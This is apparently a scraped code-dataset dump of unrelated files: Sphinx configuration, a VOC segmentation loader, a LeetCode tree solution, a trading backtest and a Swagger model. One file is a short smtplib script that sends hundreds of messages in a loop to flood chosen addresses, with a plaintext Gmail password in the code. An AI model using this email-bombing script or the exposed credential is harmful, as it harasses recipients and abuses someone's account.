exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'instagram_private_apidoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'instagram_private_api.tex', u'instagram\\_private\\_api Documentation',
u'ping', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'instagram_private_api', u'instagram_private_api Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'instagram_private_api', u'instagram_private_api Documentation',
author, 'instagram_private_api', 'One line description of project.',
'Miscellaneous'),
]
| [
"lastmodified@gmail.com"
] | lastmodified@gmail.com |
907ddd347c0090667ae70ccc22d09331b3f37284 | e4d66b0fc0ce10ec815ac1655660899645aac65c | /spamerssmtplib.py | c6843e5ced60ee05e9f1b64aa22dd569c5a72dd1 | [] | no_license | alipbudiman/spam-email-with-smtplib | 4d4d852580006ebbcce1e29afb670e23d1cde71d | 2079093a1e51578f285d3bca9eae9bd77a8055aa | refs/heads/main | 2023-05-24T09:32:07.679788 | 2021-06-06T08:43:00 | 2021-06-06T08:43:00 | 374,305,444 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | import smtplib, random
from random import randint
msg_2 = ["write your message here","you can write another message"]#<< write your message here
email_main = "xx@gmail.com"#<< imput your gmail here
email_to = ["xx@gmail.com"]#<< imput your email direction here, you can imput multiple image
total_email=300#<< total email you want to send / spams
print("Ongoing send "+str(total_email)+" Emails")
count = 0
server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
for x in range(total_email):
msg = random.randint(0,500000000000)
msg2 = random.choice(msg_2)
server.login(email_main,"123456alif")
server.sendmail(email_main,
email_to,
str(msg2)+str(msg))
count +=1
print("sending mail total: "+str(count)+"\nleft mail: "+str(total_email-count)+"\nMessage: "+msg2+str(msg))
server.quit()
| [
"noreply@github.com"
] | noreply@github.com |
77a6b962b0c5fbed8dfb17965ca021e16a2acc41 | 4cbda64e52e82d3f5b3e301505cfb246a5fd052d | /wrinkler/datasets/voc.py | b8c8c783054c80b8bd2e84ad98016c4d734458f9 | [
"MIT"
] | permissive | brandongk-ubco/wrinkler | d4b5f5d449cf6af155bf11991b8e619f4f30dcd2 | 79090c42849a2db77997bcd9171d6d885cc45d4f | refs/heads/main | 2023-02-24T17:48:12.489824 | 2021-01-25T04:34:22 | 2021-01-25T04:34:22 | 329,793,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import torchvision
from .AugmentedDataset import AugmentedDataset
# Machine-local path to the extracted Pascal VOC data -- adjust per host.
dataset_path = "/mnt/e/datasets/voc/"
# NOTE(review): these datasets are constructed at import time, so merely
# importing this module touches the filesystem (and fails if dataset_path
# is missing) -- confirm this is intended.
train_data = torchvision.datasets.VOCSegmentation(dataset_path,
                                                  image_set='train')
# 'trainval' is used as the validation split here -- TODO confirm intended.
val_data = torchvision.datasets.VOCSegmentation(dataset_path,
                                                image_set='trainval')
class VOCAugmentedDataset(AugmentedDataset):
    """AugmentedDataset over Pascal VOC that binarizes segmentation masks."""

    def __getitem__(self, index):
        sample_image, sample_mask = super().__getitem__(index)
        # Collapse every non-background class label into a single
        # foreground value of 1.0 (in place, like the base sample).
        sample_mask[sample_mask > 0] = 1.
        return sample_image, sample_mask
| [
"brandongk@alumni.ubc.ca"
] | brandongk@alumni.ubc.ca |
50ed4d571f14e93304d24a9b7773420b866e91f7 | 4bc8afa94f6d36d582962f8ccfd3537cfcf79e0c | /tree/101.py | f5798150d3306542d6f827f1f7308009d499089d | [] | no_license | hellozgy/leetcode | c641dfa363cd97ece38b843acd4adbc4c1004173 | 7d3bacf0185920ffb8985bb998e3d344d57356fd | refs/heads/master | 2021-05-03T09:07:29.414338 | 2018-08-12T03:58:43 | 2018-08-12T03:58:43 | 120,570,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
#方案一:
'''
class Solution(object):
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None :return True
return self.t(root.left, root.right)
def t(self, p, q):
if p==None and q==None :return True
if p==None and q!=None :return False
if p!= None and q==None :return False
if p.val != q.val:return False
return self.t(p.left, q.right) and self.t(p.right, q.left)
'''
#方案二
class Solution(object):
    def isSymmetric(self, root):
        """
        :type root: TreeNode
        :rtype: bool

        Iterative breadth-first check that the tree is a mirror of itself.

        Walks the left and right subtrees in lockstep with one queue of
        node *pairs*; uses collections.deque so each dequeue is O(1)
        (the original used list.pop(0), which is O(n) per pop and made
        the scan accidentally quadratic).
        """
        from collections import deque  # local import keeps the snippet self-contained

        if root is None:
            return True
        pairs = deque([(root.left, root.right)])
        while pairs:
            left, right = pairs.popleft()
            if left is None and right is None:
                continue
            # Exactly one side missing, or mismatched values -> not a mirror.
            if left is None or right is None or left.val != right.val:
                return False
            # Mirror order: outer children together, inner children together.
            pairs.append((left.left, right.right))
            pairs.append((left.right, right.left))
        return True
"1243268625@qq.com"
] | 1243268625@qq.com |
1c0e6abebd13774f2c7c79c4f287a4bc6c478dcb | f5159b2388d84022e38a52fccd0118f49679f0ae | /algofinance/backtester/strategy_example.py | 20c399c947d5bb19ab1879d38b1653cb01a91b1e | [
"MIT"
] | permissive | maxmhuggins/algofinance | e7569a8293e531aad794e734c833b5f3c3b48ae0 | 2eb1b3c0cb450d405cd297eaa7d18e956cad0700 | refs/heads/master | 2023-06-24T12:00:33.803241 | 2021-07-24T02:06:40 | 2021-07-24T02:06:40 | 345,828,167 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,047 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 3 08:10:57 2021
@author: maxmhuggins
"""
from algofinance.generalanalysis.datareader import DataReader as dr
import backtester as bt
# import datareader as dr
import matplotlib.pyplot as plt
class ExampleStrategy:
    """Toy mean-reversion strategy: buy below the moving average, sell above.

    Wires the price series into a backtester.BackTester; the trading rule
    lives in ``strategy`` and the extra plot overlay in ``indicator``.
    """
    def __init__(self, closes, dates, symbol):
        # closes/dates are parallel sequences of prices and timestamps.
        self.Closes, self.Dates, self.Symbol = closes, dates, symbol
        # Moving-average window length; also the default optimizing parameter.
        self.HowSmooth = 5
        self.StartingBalance = 10000000
        # NOTE(review): this concatenation yields
        # "Under Average Buyer,Over Average Seller (Example)" (no space).
        self.StrategyName = ('Under Average Buyer,'
                             + 'Over Average Seller (Example)')
        self.Indicators = [self.indicator]
        self.BackTester = bt.BackTester(self.Closes,
                                        self.Dates,
                                        self.StartingBalance,
                                        self.strategy,
                                        symbol=self.Symbol,
                                        strategy_name=self.StrategyName,
                                        indicators=self.Indicators,
                                        path='./figures/')
    def moving_average(self, start, end):
        """Simple average of Closes[start:end] (end exclusive).

        Returns 0 whenever the window would reach before index 0, i.e.
        during the warm-up period at the start of the series.
        """
        timespan = range(start, end)
        summer = 0
        if any(element < 0 for element in timespan):
            average = 0
        else:
            for i in timespan:
                summer += self.Closes[i]
            average = summer / len(timespan)
        return average
    def strategy(self, optimizing_parameter=None):
        """Run the buy-low / sell-high rule over every close.

        optimizing_parameter overrides the moving-average window length
        (defaults to self.HowSmooth). Side effects: calls
        backtester.buy/.sell and stores the per-step averages in
        self.MovingAverageValues for later plotting by ``indicator``.
        """
        if optimizing_parameter is None:
            optimizing_parameter = self.HowSmooth
        backtester = self.BackTester
        # Fraction committed per buy -- presumably 25% of balance; confirm
        # against BackTester.buy's contract.
        percent = .25
        moving_averages = []
        for i in range(0, len(self.Closes)):
            close = self.Closes[i]
            # Average of the `optimizing_parameter` closes *before* i
            # (0 during the warm-up period, which forces an initial buy).
            average = self.moving_average(i - optimizing_parameter, i)
            moving_averages.append(average)
            positions = backtester.NumberOfPositions
            if positions == 0:
                if close < average:
                    backtester.buy(percent, i)
                else:
                    pass
            elif positions > 0:
                if close > average:
                    backtester.sell(i)
        self.MovingAverageValues = moving_averages
    def indicator(self):
        """Overlay the stored moving-average series on the backtest plot."""
        backtester = self.BackTester
        plt.plot(backtester.Dates, self.MovingAverageValues,
                 color='magenta', label='Moving Average',
                 linewidth=backtester.Width)
if __name__ == '__main__':
    # Short daily BTC/USDT sample pulled from Binance via the project reader.
    start = '2021-03-02'
    end = '2021-03-05'
    symbol = 'BTCUSDT'
    dates = (start, end)
    BTC = dr.DataReader(symbol, 'binance', dates, tick='1d')
    Strat = ExampleStrategy(BTC.Closes, BTC.Dates, symbol)
    # Strat.BackTester.runner()
    # Sweep the moving-average window length and plot the gain per setting.
    optimize_range = range(1, 10)
    for i in optimize_range:
        Strat.HowSmooth = i
        Strat.BackTester.runner()
    plt.scatter(optimize_range, Strat.BackTester.Gains, marker='x')
    plt.plot(optimize_range, Strat.BackTester.Gains, lw=.5)
    # Strat.BackTester.optimizer()
| [
"max.huggins98@gmail.com"
] | max.huggins98@gmail.com |
b0ad500120f8469b888e170431f17043052f3e7c | d57148c74b79954ff762ce3a02c1b0ef3e79d6a1 | /libs/smartmeshsdk-REL-1.3.0.1/libs/VManagerSDK/vmanager/models/net_reset_info.py | f58017d71ca05bfc882e34f73a9d91a3d9409ea4 | [
"BSD-3-Clause"
] | permissive | realms-team/solmanager | 62fb748b140361cf620b7dd8ff6df755afd42bbe | 95fa049df041add5f8d37c053ef560d0e5d06dff | refs/heads/master | 2020-04-11T10:00:21.086457 | 2018-11-20T15:49:27 | 2018-11-20T15:49:27 | 40,271,406 | 0 | 0 | BSD-3-Clause | 2018-11-20T15:49:28 | 2015-08-05T22:15:39 | Python | UTF-8 | Python | false | false | 3,061 | py | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetResetInfo(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        """
        NetResetInfo - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
        and the value is attribute type.
        :param dict attributeMap: The key is attribute name
        and the value is json key in definition.
        """
        self.swagger_types = {
            'reload': 'bool'
        }

        self.attribute_map = {
            'reload': 'reload'
        }

        self._reload = None

    @property
    def reload(self):
        """
        Gets the reload of this NetResetInfo.
        reload configuration after reset

        :return: The reload of this NetResetInfo.
        :rtype: bool
        """
        return self._reload

    @reload.setter
    def reload(self, reload):
        """
        Sets the reload of this NetResetInfo.
        reload configuration after reset

        :param reload: The reload of this NetResetInfo.
        :type: bool
        """
        self._reload = reload

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        # The generated code read other.__dict__ unconditionally, raising
        # AttributeError for non-model operands (e.g. `model == 3`).
        # Returning NotImplemented lets Python fall back to its default
        # comparison (which yields False) instead of crashing.
        if not isinstance(other, NetResetInfo):
            return NotImplemented
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| [
"twatteyne@gmail.com"
] | twatteyne@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.